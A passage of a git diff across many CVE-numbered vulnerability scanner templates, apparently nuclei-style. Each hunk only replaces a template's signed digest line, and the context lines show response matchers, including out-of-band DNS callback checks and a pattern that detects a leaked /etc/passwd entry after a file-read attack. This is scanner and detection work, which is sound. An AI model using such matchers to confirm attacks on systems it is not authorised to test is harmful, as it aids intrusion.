4b0a00483046022100dd2b30d77bd7fdbf38132b03bf1799f609b6434de967ef4df2ad9a875f78a1a7022100b3979a2c39405f62a7af632bf637171fd653ed4121ee891ddabc6d19b422be6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a4f14fb887d4162c99d5eda9b4b44f8a1b9026c67fad542d58e4f09e8367985022100c5c3b3af216393ea60cb48060d69ca2138c766ddf29c2d9f47c4017ae54f2ab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 5be50160fd..30f4b75b44 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "") && contains(body_2, "import_form_template")' - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450220353eff964c533a49e3c19d5bb0058b18616fc012d2fdba215438ed89028e46fe022100f8f7ba5442e1e6c4a9f638ce048f7fd25f8e3b8bf43e6f77c3b3226be5003f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051ec230e42ab3d71b2df53e401ba10a6682241d7989e90d7011432f85b6c166902210084f6c6e8762f3a08a4ccce739038532489a572defba5e4e59c17d34a9470de42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 053ee7a608..8782959d43 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -52,4 +52,4 @@ http: - contains(interactsh_protocol, 'dns') - status_code == 200 condition: and -# digest: 4b0a00483046022100e9856a868993faad7af5c56725bd8696e4de74eea2c24b5ad1ba5f8877d76563022100b1d699ee80eddd7171d4ef25f622d44a5c87142dd41afd820d4ad1ff2b9b70b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0d7db72cf2d3250b9cec6f4809158d7a36e2c52763f0d5bb3d4063ed878f6820220298d902c4967c3ff8d30ccca8aded010c4b182fd6d9af361525c23d6730e4bb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index bbc05135e8..a1a7d66ca9 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -49,4 +49,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b7f0be98221b5f266e90dba3b2252cfbaf63e4ce9f4673e14be3b78cb46ef9d022100910b2d487c59c89de52ae909540e8e890e4dc89dc7240686aa95181c045ee5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index cd108edfd0..a18c54bbb8 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -50,4 +50,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4a0a00473045022100e2618a3728707739f3a031285e196d3b43d5bf03d3f4e6e53e28d654b97d694602203d8fd37c306cee28bd1c86e457dbde123a4af70c48824d8539dca9d6e6106e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eccd6573796683e57056fb5dc00be04eb056625acbc7478e5f3c0d4d5f780ddc022001852cd078ce0c1ab64b9afb70fe440f5c3d0b7e64b303e4b7f3e78672ab882c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 3094b803ce..949dfa0687 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -67,4 +67,4 @@ http: part: body_1 regex: - 'ico_res_(\w+)_on\.jsp' -# digest: 490a00463044022019ed3a01869b520c888624caac663690abb0239bbe29ce2bd37bf0c9da3ceed102203bb8f2aef38ca4aa0349fe47f7a0e72a004678a13fb247d0ebd2abfbea426827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220710398a4a993d2c9e45d26d85f9c179770dfdd348036bd851f0daca96e1055d9022021d4a672da767d580f3c36cb6b47aa8439cd36951761b993231f735ecd100f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index d91014ab9d..064fde68dd 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">w71ch") && contains(body, "mooDating")' condition: and -# digest: 4a0a00473045022027cd912e53fe3d0f2326275dd4ccade28bab4684b50300171df9b865796e73be022100a4a0c5e64721b43ab72868d32738f431adf44fa42083842dc9faa71541da7677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8e2700b8f5be675dc9f95b5ea57b298a1168058d65a5eca4293bdb3e2c29d8602203a7928ef43f783f95a42125895d5ef3073b7d99808f8989d5c24611901a67565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 4a34e6d213..aea850fd7e 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210092efe2f7cbaa87951776951c53fc173d616cbec9006b475bef3a28d4e713c0a302204f45c907afe1173bcb87289b260f05e5301354aa04df9c0b878d45914e35b075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d59a360884361f658aa4ed740d619a553796291f36085ba3a6f6d0d925e8e0f022100d609d48648eade90c15f03f07573bce9aaa52138ff9c38ca80f239a2a0aded03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index 0233a5617a..bf01b42796 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "mooDating")' condition: and -# digest: 4b0a00483046022100e52e37ba7cbb0809f204d6bf85295214994040f499549c02451dc287877adeb5022100e6f6a88c449847bf9aa171e91057daa40d93e1f86e2123e04355ff621d74b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e7b8940c3c99b564b4bddcd3a0a632bf8982f159d113a5fc4831416ed9e1a9e02200a4ef1d7ed1aef86a0ae2b23f751fe37b70b48ba7b55de80e1185477b905c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 1cb514d945..b112ba8913 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">","mooDating")' condition: and -# digest: 4a0a0047304502210095ca1683def9b0c91047311e6f9ac37e0cead694dff6725f35ea1656e831b3ae02205ee54ee3b2a7ac6698d824c665300872a060654f713a6fa82658a6734360c28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202751986b59332bc745de2c5c701823724a9ee6e91513a29689d5429469c723de022061e634ed487b4f3c4e3fb10ff500c82c0aa5c676d3e55638270d13781455afa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 2ee27c1645..4a75ed5211 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooDating")' condition: and -# digest: 4a0a00473045022100df789f78e15433e066ac366cd45fb0ab831dd27ec3327f322386fd167783fccf02207493d5c8e7275ba99d828a68c7bd4ce44c79b42867630faba0abc7e1b065b1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097be91084c3b6a75bcb35a7556fc7e09a909c5f07593800517da311c75b405a2022027c964fd5f65c5f28663417791ae7f162b89013265851f983a494cefa9fa1322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index b25bb87869..b1376febf8 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">s9a64") && contains(body, "mooDating")' condition: and -# digest: 4a0a00473045022100eb8f361af200c602790d9ee669037a9794849480b4fd8c4985e9f9c24aea7a6a022029d23bdd9a0f5f73cbd8fde5c3dbda1648d7da792d88eaef5d89545923d756e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100976a429a0acadd41d7c73ccebbad61db7e7f7563ef6437758f5b07076b5218a6022100ec673a999416f67a8f70ed78449316a200fc7f2bcd4c6745c66108efd3ce5ea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 0b11d5aa02..09c0af296a 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "","\">go to")' condition: and -# digest: 490a00463044022028c709bfbd562c3f69c41bbb66973f2958762095b47c242410025b3a2271b7e90220062ee86e230c48160df50455b3584210913128460f183bf14324eca1353a77e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058675a969abbe4a2b7fa295342715495195d739ef396e23a4a0d438308f7da2602204db3cacf7da7334c43cc5614d12dea9155acca0e5edf872eff3e6c17a315c7ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 15ef4b2699..7a937c1c6d 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -73,4 +73,4 @@ http: - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException") - status_code_2 == 400 condition: and -# digest: 4a0a0047304502203102c0be553270c1adbdbabe997bbaea6e3adaf6c2c1e46a703305f68834c2cc02210094818702b8fab66d0d303cf006c3a5a3a12f0140323564cfd177e55e21325a0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207913b60da21ca7a9f42e1038bdcef2c37179c41070550c9ba2c1a657b15aeed5022008b3bf5bf870aa43066ff7b66df7cc15b4b52b70e57706a7975de094f182ee9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index c959bc28b0..6fb0560f37 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -43,4 +43,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "All courses")' condition: and -# digest: 490a004630440220588a1a20171ed9e63186819de5ce752cf21132d717d03d74100877a2037385cf022007fb5a6ec93b218fd213ed4c152c786d03f8e6aae0ec8e2eaee9177460c173e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc3ef9c3df26b3afecca702e9abd986af4773485c1261f369bb32e2c059bc1040221008fad9bec13f7b3bb22ed5cbddafb19b3d28df6f4bc7d80092da76e900d2525ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index a76c9f68a0..04a9e3c513 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -76,4 +76,4 @@ http: regex: - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="' internal: true -# digest: 4b0a00483046022100c9a7773d904e9fa5c973745a8ee5c0f73380b28f646d8f3ff079eafd3a063e7c022100f3fa44d5e64cf31c9b245337c65ffa6e69c59c68ba5b34ffc15408ed780def70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220210b73cd75866a80ef8cf1ef7f0c230ccb8335664a46ca37d236501bb802760a0220455c59c9fdf00b97f3082c658c098ec010d464d80f683693b3d6f3f2b1cb8672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index c1d2641c2a..87850f6e68 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -44,4 +44,4 @@ http: - "contains(content_type, 'text/plain')" - "status_code == 200" condition: and -# digest: 4b0a00483046022100c8237ade5adc55459f68743aca2aa30e8aa8de98fcffff36262985d1038add45022100f003f17b5f16a43845084bc29f3bc6bbcc86845bb32e5df35fe9c65002dd2bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008eef2df71e4ec7a1c95eb0f6c0b02ea05a34fa520204cb86ff7caa631347ed10022100ad957b79ec1db60d79e81321296879187e38884b187b9647ab712761b6ed96fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 65816e9130..dfaa8f2b83 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -62,4 +62,4 @@ http: part: header_3 status: - 200 -# digest: 4b0a0048304602210090ac3eea92e5a41afb2bb6cc79b850803be8d90654e131d3155f74826abc4ae8022100ad646f643e976f8f859ef1aef542e1d37db72aa3fa2a840a964ad510f756f881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b707b4d3b5b7b3c72604ee68acc636ed7c5af48169fef985f1ce76826fab1c870221008de99fb0c60906d5ee1304e323d132dca9b12994a5c1e18a3da00b34603dc9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 69d5a2008e..4695da7659 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3246be44ceef6ea2e435be5a11aae0e8e6a5b0bff8ff778f8541446b1566252022100c08b1259680e594668aebd2ebdd3e2bc2a1937bc404b59c4bc2b4c3bbb0747c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036ef8b4f6f889c0ec877ae9a013ad526d94d3149fb8c517c97b9a2a0ba39054f02202c881f4ff35129806cf26c35d0a755001d55e1f6eddd502ee10e56dfcd596aa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 5161381a08..84919e4c5f 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -62,4 +62,4 @@ http: part: header_3 status: - 200 -# digest: 490a0046304402207f76db15bb398543e9501f63c4ad814bd902f8f8c51a8ee350506f79735e17ae02206fef9f11657871d39967978871c9fb85398198ed6f4078057df0ebbfdf85ea41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b12af2cf2c76b4847a0c93cda3e5872ecab627071d48a9b4398f5d04ff87342802205f2a3ac8a4d3ce38ffc44a860ef7451a4cef8622976e221429d5478f0b794e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 950b60a1cd..962ddcd133 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_1, "Aria2 WebUI")' - 'regex("root:x:0:0:",body_2)' condition: and -# digest: 4a0a0047304502210095b97a18980d901d900ac8182e8f6d76a5a2a67a7ee84484e85a9a171ec2970a02200bf1e08f9eb496e54ea1b42f07c0c06c2e2f7a83917c4b1b9a4d4ac9ca61b7ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205642c88712c4ca0de0dc516a86a8b77ef72c1cd5a3a62d78bd3de9c30a461a1402210082ed3fac6d044d18c610af07f0b4979e18c4643720c27be2843249a7ee965742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 7c0df7cb84..67e334eca5 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -45,4 +45,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4b0a00483046022100c6b50e3324b68352bd5bfe29633a9db388f1c831c218c8a4e23106a478bc6b7002210099ac0e1d64eae74b2664fccf7eff0e8c2cc9e5cd862c7b3e5abb81755c90e381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025fa7213cde7b40ca9e398ead9280e4297d285a3cad3948d79b396586c5ada500221008b224395ac8dfc494bb435b7b7c5102e2515eb19d27157d070df13c766c10e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 5b82e3d346..c36cdd4d6e 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2542c5b578aa1b6054c4391c618faf48d5a6721aa2a2c6f8f5282d057aaeb62022100f40e458db85ae7f25e9ceda5370d49473cb23b2dbd1db4b82625581ce539525a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a9cdd49e5fc62423b550121259ff1d80c849ab273f66ae6579dcfa7d245269d02206782a407244948dbae7962e67a7a5310a5503ad9a6f445a9f4d7813f0e3b3ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 8cbd252f43..182469a15f 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and -# digest: 4b0a00483046022100c25eecdf587234017cf6b626efb9d75b33a6de8aa74f8c2fb47d7a9a88a1e6630221008ead6f563992b037d679640d1b38a8f29f1ba2082ec853cf4a27034c2a8595ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd81fab299fe2f6dfd7848f41bdedef38af20eca6216c03868f2459ab0e54287022100b67c2e415c35823e85ebfe762f7e828909e4eeb134360312d24ee5e68c5cd95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 33441386ac..93632ed6a7 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066fea1c991470ad12b0b6368cc977cb17842be9a515cfb209f347e80761a7fca02210099ca332958026e4c04ae258f60fead3e94e63aac0b964f658b9b0e0c795bce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220752d5fdf38bf0e6755332bfc4826a2b58985659f3351ecf5cdfe7cd736c5239d022100f71fb0de070712b29e120694ed800c06fc13a08f93ee7de72c7bc3beed77849a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 7b736919f8..58f1e953e7 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200265cbcb6af05e61fad5c3086201ea2c320faf4a231352a2375f2f5b58537fd3022100bc56106b38fa09b709016bfe171871b601e72d08fdf0d3906c7d071c8fb2826a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d42e07ce0725cc3c29bc283508e66446d4e4ea04ad76ef351806af55652899a022100b20754cdd73731a8db161450ad7163b290c3e877d388e6d0892cb0f816dce251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 61a62b5d5a..4cb540787a 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045b80f7ecb911d219381e8f7789434632ff0c96af4db2c08ef74e4b32b7d9f0f022100f70379fd255ea20f6d6da9608fc81cf4423b55421650a9c5fc4dd3834df6845f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081fd832306abb4c2db24ccc4def607909798787bc61db7834428d4677baf10ea0221009f538af7773ea40facf783b248a551184e163f2c19291d156c36330425ca64ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index d972e97231..51b127efc6 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -54,4 +54,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4a0a004730450220433b7e31747bf747810caff412effad724e047b8f0cfdbf37de29f43da98fb3d022100f0a4df6bcc9fd476fe130c2cdf286da02199f192c93479f7d3acca35579d666c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f1a0c8bcefa038f928d8c3d428072dbf999a9204695c95506ed91ff90ee2c8d022100a91d93e2e994eb753b83e53e8c90515b98407dc3897a8f8984177dd56261da60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index b00e4c04a2..1e99397e05 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -42,4 +42,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, ">") && contains(body, "IceWarp")' condition: and -# digest: 4a0a0047304502203930c735d889ed16173497baf4f00e9422930afaef7984f350a34fa7a68289fb022100838b15182d9d030c464bc3252a19193f0ad318b5b23362ec78e0f5d8e58ad0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2ae7ae440b4eec6e6da255baf7f80cc35c640f8e7e4de0a5d363d2a8767f387022071038577f46d450adbb855b9ec4df1a5badf08408433fffb0972b205e056be4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 7bdeafadf7..3187e5044b 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -42,4 +42,4 @@ http: - 'status_code_1 == 200' - 'contains(body, "Record deleted successfully!")' condition: and -# digest: 4b0a004830460221009cfde4a69aa6b2b5742a2830be00f5359ecd9be30f15f6522fb80e4ed32429ce022100d8cc11c0878452a27fb9ab372e2f67fbccd3e8b9ca30079ae62e533abede4b71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6387053a528f5da55af6a431c8e8a7256148c4be5ce8f6dc5db9b3b8974b1f022100c4d7d900752e413d2a79cff723d5e88bab601eade61c0ed12b050cf87dc10a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 2a4ed4126a..a8bf286cc0 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042548140cbcebc9b51e355d4673028e53db18e5e157b176796ea8abb79e5dc7902205f298d4225c8d922ae3c4a9a5f23956880fed673540ded1004b53276128d20d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220056d69daada66633276ae37f2d2c9c36013ba0f1d18e7e240f40fd6db47a15b1022100878f118a3ebe1a847cf47ff121b388b4fc0c454c9138b800f184f6d752c5b206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 4a57276e75..cd97e25471 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -49,4 +49,4 @@ http: - 'contains(response, "Axigen")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502210089d5aa0ce825695bb9ea5e7f7d0ed99275c71b68c467bbc2b7a3f5731ea21a6b0220691c6922540b2937f29bd4712cd7da837b1c42e3305b9aeabc102b8b17c9005d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201711e917883974fc1055e22022c081d81aefb637222322fc595cf91d992c05b8022100b25c9d8d083dc86f817080e290fe7dd21bbeec43c59b4fb98ba9724d52857b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 3148a7c620..e4204363ec 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502205688139ac072aa9cc722af60b180b98debd637c0905e2151de237b1f47ef1fe5022100e935f1d54586ab3c5b62921b0477047bc653ee866a09fae50f38de108caec714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f21a2b81ae7fd83b758582647b0492ff9a140bba7412af9fbd1a9acfc5e27583022100e2cfcb50142a1e7f75d7dbb067c13e075607a023ae2c018557176eba2df700da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index e39b936fcd..362f05240d 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Booking", "Arrival", ">")' condition: and -# digest: 4a0a00473045022100dd5abe7b4ecc19617163506032de3f314ba51740ebceebacbe16cca232327bd1022068118d6d2da41b0d087107dd4c56af59e7c93d834106bd2a0e5d2e3e3c64ecfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011f3ef24c41dbb0af2002b9e94af8e13843e80882af1ad261dd9824d612d5996022100d4efe87afa3e996a33be585e48d069e66c01b0e75805473390a91fd7af811806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index d7d3b8bbb0..355c1c497b 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -47,4 +47,4 @@ http: part: body words: - "dd556350275e2ee0a2e877cea9c8a74a" -# digest: 4a0a0047304502202bfc9da42e19e2e2ee3b4774db0a0deed67a87e5115c8868e175566429724498022100ef5913fc5f59bb9dbf437ebb76d6ec44d1e3fff82794bf190909f9e6acd3ec98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100957697fedc1e8c0e72418b4a7ff9772edd859418f1b322713e3e6054d20c362d022100ecc7504e92125a1f7a4a4e533b58833d07d6e312f31036b0938734535c480fbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 9787d55ceb..70da6f403e 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 